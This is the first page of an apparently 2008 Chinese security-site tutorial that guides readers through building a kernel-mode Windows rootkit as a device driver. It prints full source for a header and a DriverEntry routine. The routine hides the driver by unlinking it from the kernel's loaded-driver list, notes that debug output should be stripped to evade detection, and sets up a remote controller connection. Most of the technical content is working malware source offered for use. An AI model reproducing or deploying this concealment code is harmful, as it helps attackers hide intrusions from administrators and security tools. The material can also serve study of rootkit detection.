Rootkit隐形技术入门(1)

作者: 宇文出处:51CTO.com　2008-03-20 13:22　砖好评论条　进入论坛

阅读提示：在安全界，rootkit已越来越引起人们的关注，而rootkit技术的过人之处就在于它的隐形技术，本文旨在向读者打开一扇通向rootkit隐形技术的大门。

【51CTO.com 专家特稿】摘要：在安全界，rootkit已越来越引起人们的关注，而rootkit技术的过人之处就在于它的隐形技术，本文旨在向读者打开一扇通向rootkit隐形技术的大门。

一、综述

本文将引领读者打造一个初级的内核级Rootkit，然后为其引入两种简单的隐形技术：进程隐形技术和文件隐形技术。同时，为了让读者获得rootkit编程的相关经验，我们顺便介绍了rootkit的装载、卸载方法，以及必不可少的测试技术。

本文介绍的Rootkit的主要构件是一个设备驱动程序，所以我们首先了解一下我们的第一个rootkit。

二、rootkit主体

本节引入一个简单的rootkit实例，它实际上只给出了rootkit的主体框架，换句话说，就是一个设备驱动程序。那么为什么要用设备驱动程序作为主体呢？很明显，因为在系统中，设备驱动程序和操作系统一样，都是程序中的特权阶级——它们运行于Ring0，有权访问系统中的所有代码和数据。还有一点需要说明的是，因为本例主要目的在于介绍rootkit是如何隐形的，所以并没有实现后门之类的具体功能，。

我们将以源代码的形式说明rootkit，对着重介绍一些重要的数据结构和函数。下面，先给出我们用到的第一个文件，它是一个头文件，名为Invisible.h，具体如下所示：

//Invisible.h：我们rootkit的头文件
#ifndef _INVISIBLE_H_
#define _INVISIBLE_H_

typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD* PDWORD;
typedef unsigned long ULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;

typedef struct _DRIVER_DATA
{
 LIST_ENTRY listEntry;
 DWORD  unknown1;
 DWORD  unknown2;
 DWORD  unknown3;
 DWORD  unknown4;
 DWORD  unknown5;
 DWORD  unknown6;
 DWORD  unknown7;
 UNICODE_STRING path;
 UNICODE_STRING name;
} DRIVER_DATA;

#endif

我们知道，应用软件只要简单引用几个文件如stdio.h和windows.h，就能囊括大量的定义。但这种做法到了驱动程序这里就行不通了，原因大致有二条，一是驱动程序体积一般较为紧凑，二是驱动程序用途较为专一，用到的数据类型较少。因此，我们这里给出了一个头文件Invisible.h，其中定义了一些供我们的rootkit之用的数据类型。

这里定义的类型中，有一个数据类型要提一下：双字类型，它实际上是一个无符号长整型。此外，DRIVER_DATA是Windows 操作系统未公开的一个数据结构，其中含有分别指向设备驱动程序目录中上一个和下一个设备驱动程序的指针。而我们这里开发的rootkit恰好就是作为设备驱动程序来实现，所以，只要从设备驱动程序目录中将我们的rootkit（即驱动程序）所对应的目录项去掉，系统管理程序就看不到它了，从而实现了隐形。

上面介绍了rootkit的头文件，现在开始介绍rootkit的主体部分，它实际就是一个基本的设备驱动程序，具体代码如下面的Invisible.c所示：

// Invisible

#include "ntddk.h"
#include "Invisible.h"
#include "fileManager.h"
#include "configManager.h"

// 全局变量
ULONG majorVersion;
ULONG minorVersion;

//当进行free build时，将其注释掉，以防被检测到
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
 DbgPrint("comint16: OnUnload called.");
}


NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING
theRegistryPath )
{
 DRIVER_DATA* driverData;

 //取得操作系统的版本
 PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

 // Major = 4: Windows NT 4.0, Windows Me, Windows 98 或 Windows 95
 // Major = 5: Windows Server 2003, Windows XP 或 Windows 2000
 // Minor = 0: Windows 2000, Windows NT 4.0 或 Windows 95
 // Minor = 1: Windows XP
 // Minor = 2: Windows Server 2003

 if ( majorVersion == 5 && minorVersion == 2 )
 {
  DbgPrint("comint16: Running on Windows 2003");
 }
 else if ( majorVersion == 5 && minorVersion == 1 )
 {
  DbgPrint("comint16: Running on Windows XP");
 }
 else if ( majorVersion == 5 && minorVersion == 0 )
 {
  DbgPrint("comint16: Running on Windows 2000");
 }
 else if ( majorVersion == 4 && minorVersion == 0 )
 {

  DbgPrint("comint16: Running on Windows NT 4.0");
 }
 else
 {
  DbgPrint("comint16: Running on unknown system");
 }

 // 隐藏该驱动程序
 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
 if( driverData != NULL )
 {
  // 将本驱动程序的相应目录项从项驱动程序目录中拆下来
 *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
  driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
 }

// 允许卸载本驱动程序

 pDriverObject->DriverUnload = OnUnload;

 // 为本Rootkit的控制器配置连接
 if( !NT_SUCCESS( Configure() ) )
 {
  DbgPrint("comint16: Could not configure remote connection.\n");
  return STATUS_UNSUCCESSFUL;
 }

 return STATUS_SUCCESS;
}

共6页: 1 [2] [3] [4] [5] [6] 下一页

【内容导航】

第 1 页：综述	第 2 页：rootkit主体
第 3 页：配置管理器	第 4 页：交换数据流
第 5 页：rootkit的安装	第 6 页：测试rootkit

关于 Rootkit 隐形安全的

文章

博文

帖子

· 安全专家警告Rootkit技术并不是唯一威胁(08/08)

· 网络安全手册<一>(06/04)

· 让浏览更安全下月IE7将标记安全站点(01/05)

· 企业存在的十五个信息安全问题(03/20)

· 安全界最具影响力的15大人物排行榜(03/20)

· Cisco交换机端口安全介绍

· Apache Web服务器安全配置全攻略

· 解读企业安全策略制定中易存的五点误解

· 安全模型之数字签名

· 无线网络实验之四：无线网络的安全设置--WPA

· 西安双线服务器托管，铁通服务器托管\南北互通..

· 系统安全：Windows系统安全模式下的另类杀毒方..

· 系统安全：Linux操作系统防范黑客的一些实用技..

· 系统安全：实用技巧之解析Linux系统GRUB故障修..

· 系统安全：Linux主机服务器被入侵后需采取的措..

专题

我也说两句

叫好

拍砖

中国领先的 IT 技术网站 ·
技术成就梦想

·简单驱动编写与windbg调试
·浅谈国内的渗透评估过程

· PKI正在进行的革命性演..
· 网站站长必读：十点技..
· 联想网御UTM连锁企业解..
· 企业如何进行计算机取..
· 发现新病毒 ntldr.exe ..
· J0ker的CISSP之路：系..

· 安全产品介绍：卡巴斯..
· 安全技巧：七个简单方..
· PC安全隐患：29%僵尸电..
· 西安双线服务器托管，..
· 系统安全：Windows系统..
· 系统安全：Linux操作系..

排行榜

·ARP攻击防范与解决方案 (查看212466次)
·ARP病毒攻击技术分析与防御 (查看41621次)
·远程控制软件VNC教程和对内网机.. (查看36493次)
·2007年八款高性价比杀毒软件对.. (查看34873次)
·我是黑客我怕谁——讲述黑客的.. (查看33837次)

·ARP攻击防范与解决方案 (567个砖)
·51CTO安全专访：信息安全的基石—安全操作系统 (443个砖)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (431个砖)
·身份认证技术 (185个砖)
·病毒查杀专题 (168个砖)

·清除流氓软件——51CTO特别专题 (707个好)
·ARP攻击防范与解决方案 (536个好)
·51CTO调查：七成技术人员不相信“可杀未知病毒” (483个好)
·51CTO安全专访：信息安全的基石—安全操作系统 (461个好)
·深入了解PGP加密技术 (198个好)

·安全防范与策略 (12月)
·网络技术经典基础教程 (09月)
·CISSP认证成长之路 (09月)
·国内安全厂商新排名出炉谁是你心中的第一 (08月)
·冷眼旁观2007年半年安全报告 (07月)

·遇到这样的程序员,你怎么办?
·iSCSI应用与发展

· 客户应该在意敏捷吗？
· 开发社区对SQL Server ..
· 七种服务器维护最佳技巧
· WCF开发指南之一构建服..
· 友善还是冲突？开发团..
· 八款主流桌面Linux实际..
· 最具影响力10大IT技术..
· 新并购协议未达成共识 ..

· 谷歌中国公司卷入偷税..
· 韩国前杀毒软件CEO涉嫌..
· Windows Server 2008 T..
· VS的Ruby in Steel提供..
· 详解大型数据库的设计..
· 隐私保护技术系列：
· 苹果发布Safari新版本 ..
· 英特尔阐述未来多核架..

订阅技术快讯

电子杂志下载

名称：SQL Server数据库管理精品黄皮书
简介：书中文章经过精挑细选，便于用户能根据自己的实际工作和学习，快速在本书寻找到相关资料。内容涵盖了SQL Server的安装与升级、语句查询、数据备份和恢复、自动化任务、数据同步、数据字典、安全和预防、性能和优化、集群等各方面应用信息，以及DBA管理人员在数据库管理工作中

名称：2007路由技术大全
简介：《2007路由技术大全》由51CTO.com网站特别策划制作，该书包括路由器技术、路由器产品、路由器配置、安全设置、路由器故障处理、路由器密码恢复，以及广大网友在实践使用中的心得经验和技巧文章，内容注重实用性，适用于初学者入门，也适合多年从业者提高，是一本实践和理论完

名称：网络安全精品应用黄皮书
简介：《2007精品网络安全黄皮书》包括了9个大类24个小类， 800余篇文章，内容包含了熊猫烧香病毒、DDOS攻击、ARP病等热点问题的介绍及解决方案。从病毒查杀、防范、系统、数据等各方面的安全设置到黑客技术的了解、防范，涉及到了安全应用的全部领域, 由浅至深内容全面。

专题

最多好

最多砖